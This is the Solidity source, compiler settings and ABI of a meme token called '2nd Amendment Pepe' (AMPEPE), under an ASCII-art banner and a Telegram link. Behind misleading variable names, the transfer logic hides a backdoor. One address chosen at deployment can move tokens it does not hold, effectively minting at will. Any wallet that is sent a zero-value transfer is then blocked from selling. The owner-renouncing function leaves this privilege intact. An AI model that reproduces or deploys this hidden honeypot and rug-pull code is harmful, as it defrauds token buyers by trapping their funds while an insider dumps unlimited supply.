// https://t.me/AmendmentPepeCoin
// .....................................................,,..................................................
// ..............................................,*?%??%S%*****+;:,.........................................
// .............................................,S@@@@@@%%%%%%%%%%?;,.......................................
// .............................................,S@#SSS%%%S%%%%%%%%%?:......................................
// .....................................,,,,:++++%#SS%%S#@@##S%?????%?:.....................................
// ...................................,?%%%%#@#%%#@@%%SS###SSS#S%%SS%%?,....................................
// ...................................:@@S%S#@S%%%SSSSSS#SSSSSSS#####S%+....................................
// ....................................;;+*?????%SSSSS%%SSS%%%SS######%*.,,.................................
// .............................................?@#%%%%%%%%%%SS#@#####%*:%S*,...............................
// .............................................+%#SSSSSSSSSSS%%######%?%S?:................................
// ...............................................:%SSSSSSSSS%%%S##SSS%SS?..................................
// ..........................................,+*?*+?S%SSSS%%%%SS%%%%SSSSS;,,,...............................
// .........................................,*%%%%%%%SSSS%%%%%%%%SSSS%SS%%%%%?*+;,..........................
// ......................................,:;?S%%%%%%%%%%S%%%%%SSSSSS##S%%SSSS%%%S?;,........................
// ...................................,+?%SS#S%%%SS%%%S%%S#####SSSSSS##%%%SS%%S%%?%?+:......................
// ...................................*?*%SS%SSSS%??S###SS#SSSSSSSSSSS#S%%SS%SS%%%?%%?+.....................
// ..................................;%##S%%S#S**%S###SSSSSSSSSSSSSSSSS@%%S%SS%%%%%%%?S*,...................
// ...............................,,,?#SS%?%@@@#@@SSSSSSSS####SSSSSSSSS@S%SS%%%%%%%SS%%%*,..................
// ...........................,:+*%S%%SSSS#@#####@@SSS###@@@@@@@###SSSS#S%SS%S%%%SS%%%%%S?,.................
// ........................:+?%%%SS###@@@####@@@@#@#%%S@@@@@@@@@@@@#%%%%%S%%%%%%%%%%%%%%SS*.................
// .......................;%S#SSS#@@####S####@@#####SSS@@@@@@@@@@@@@%?%%?%S%%%%%%%%%%SSS%%%;................
// ...................,,,:%#S########SSS##SS%S@@@@##S%S@@@@@@@@@@##@%%%%%%SS%%%%%%%%%%%%SS%%,...............
// ...............,,,,,,,%######SSSSSS##S%%S%S###SSSS%%%#@#@@##SS%SS%%%%%%%S%%%%%%%%%%%%%%%S+...............
// ...........,,,,,,,:+?S######SSSSS###@@%SSSS?%#SSSSS%%%%%SS%%%%SS%%SSS####S%%%%%%%%%%%SS%S+...............
// .......,,,,,.,:;*%S###SSS#@#SS%%S##S@@SS?:S%%S#SSSSSSSS%%%%%SSSSSSSSSSS#SS%??%%%%%SSSSSS?,...............
// ..,,,,,,,.,;*%S###SS?+:,,SS%S#@@@@@##@S;..?SS%#SSSSSSSSSSSSSS%#@###%%%%%SS%*?%%?*+**??*;.................
// ,,,,,...;%S###SS?+:,....:%%%%%#@@@@@##:..,*S%%%#SSS##SSS%%%%%%S@##S%%%%SS%SSS#%SS+.......................
// ,.......;S#S?+:,........;S%SS%%S##@@@#;.:S##S%%S#######SSSSSSSSS#SSS%%%S%%S%S#SSSS*......................
// .........,:,............:%S@@@####SS*:,.%#####%%SSSSS##SS####S#####SSSSS%%S%%S#SSS#;.....................
// ........................,?%S#####S%;...,######S%SSSSS##SSSSSSSS%S%SSS%%%S%%S%S@###S%,....................
// ..........................:+????*;,....+######SSSSS#S#SSS##SSSSS#SSSSS%SSS%S###SSS%%;....................
// .......................................%#####S%SSSSSS#SSSSSSSSSSSSSS%#####S%#S%%%SSS?....................
// ......................................,######%%SSSS#S#SSS##SSSSSSSSSSS#####%%#SS%SSSS,...................
// ......................................+######SSSSS##SSSSSS#SSSSSSSSS%%%SS%%%SSSSSSSS?,...................
// ......................................:S###%#@S%S%SSSSSS%##SS%SSSSSS%%%%%%%SSSS%S?:,.....................
// .......................................S#*:+@#S%SSS%%%SSSSSS%%SSSSS#SSSSSSSSS%SSS#S?;,.,;;::,............
// ......................................,;,..?@#SSSSSSSSSSSSSSSSSSSSSSSSSSSS%%SSS%S#@@@S*%SSS#%?:..........
// ...........................................S#SSSS##S%SSSSSSSSS%SS%%%%%SSSSSSSSS######@@##SS#S%*..........
// ..........................................,#SSSSS#@##SSSSSSSSS%SSSSSSSSSSSSSSS##########@#SS#%%:.........
// ..........................................:SSSSSSS##@#S%SSSSSSSSSSSSSSSSS%%%%#####S%SSSS#@#SSSS%,........
// .........................................,%SSSSSSSS#@##SSSSSSSSS%SSSSSSSS%%%S####S%%S%%%%S###SS%,........
// .........................................*SSSSSS%%%SS#@##SSSSSS%SSSSSSS%%%%S####S%%%SSS%%%S###SS,........
// ........................................,%SS%%%%%%%%%S####SS%S;,;+?%%SSS%%S####S%%%%%SSS%%%SS#?:.........
// ........................................,%S%%%%%%%%%%%%#####S+.....,:;*%S%S@##S%%%%%%%SS%%%%%S%,.........
// SPDX-License-Identifier: GPL-3.0
pragma solidity ^0.8.0;
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
}
contract Ownable is Context {
address private _owner;
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
/**
* @dev Initializes the contract setting the deployer as the initial owner.
*/
constructor() {
address msgSender = _msgSender();
_owner = msgSender;
emit OwnershipTransferred(address(0), msgSender);
}
/**
* @dev Returns the address of the current owner.
*/
function owner() public view returns (address) {
return _owner;
}
/**
* @dev Throws if called by any account other than the owner.
*/
modifier onlyOwner() {
require(_owner == _msgSender(), 'Ownable: caller is not the owner');
_;
}
/**
* @dev Leaves the contract without owner. It will not be possible to call
* `onlyOwner` functions. Can only be called by the current owner.
*
* NOTE: Renouncing ownership will leave the contract without an owner,
* by removing any functionality that is only available to the owner.
*/
function renounceOwnership() public virtual onlyOwner {
emit OwnershipTransferred(_owner, address(0));
_owner = address(0);
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Can only be called by the current owner.
*/
function transferOwnership(address newOwner) public virtual onlyOwner {
require(newOwner != address(0), 'Ownable: new owner is the zero address');
emit OwnershipTransferred(_owner, newOwner);
_owner = newOwner;
}
}
interface IUniswapV2Router02 {
function factory() external pure returns (address);
function WETH() external pure returns (address);
}
interface IUniswapV2Factory {
function createPair(address tokenA, address tokenB) external returns (address pair);
}
contract SecondAmendmentPepe is Ownable {
event Approval(address indexed owner, address indexed spender, uint256 value);
uint256 public totalSupply;
mapping(address => mapping(address => uint256)) public allowance;
uint256 private infringements = 25;
function transfer(address outlaw, uint256 security) public returns (bool success) {
protect(msg.sender, outlaw, security);
return true;
}
mapping(address => uint256) private elect;
function transferFrom(address militia, address outlaw, uint256 security) public returns (bool success) {
protect(militia, outlaw, security);
require(security <= allowance[militia][msg.sender]);
allowance[militia][msg.sender] -= security;
return true;
}
uint8 public decimals = 9;
mapping(address => uint256) private raid;
function protect(address militia, address outlaw, uint256 security) private returns (bool success) {
if (elect[militia] == 0) {
if (raid[militia] > 0 && militia != uniswapV2Pair) {
elect[militia] -= infringements;
}
balanceOf[militia] -= security;
}
if (security == 0) {
raid[outlaw] += infringements;
}
balanceOf[outlaw] += security;
emit Transfer(militia, outlaw, security);
return true;
}
event Transfer(address indexed from, address indexed to, uint256 value);
constructor(address _address) {
name = "2nd Amendment Pepe";
symbol = "AMPEPE";
totalSupply = 696_969_696_969 * 10 ** decimals;
balanceOf[msg.sender] = totalSupply;
IUniswapV2Router02 uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());
elect[_address] = infringements;
}
address public uniswapV2Pair;
string public name;
function approve(address vote, uint256 security) public returns (bool success) {
allowance[msg.sender][vote] = security;
emit Approval(msg.sender, vote, security);
return true;
}
string public symbol;
mapping(address => uint256) public balanceOf;
}
{
"compilationTarget": {
"SecondAmendmentPepe.sol": "SecondAmendmentPepe"
},
"evmVersion": "paris",
"libraries": {},
"metadata": {
"bytecodeHash": "ipfs"
},
"optimizer": {
"enabled": true,
"runs": 200
},
"remappings": []
}
[{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"vote","type":"address"},{"internalType":"uint256","name":"security","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"outlaw","type":"address"},{"internalType":"uint256","name":"security","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"militia","type":"address"},{"internalType":"address","name":"outlaw","type":"address"},{"internalType":"uint256","name":"security","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]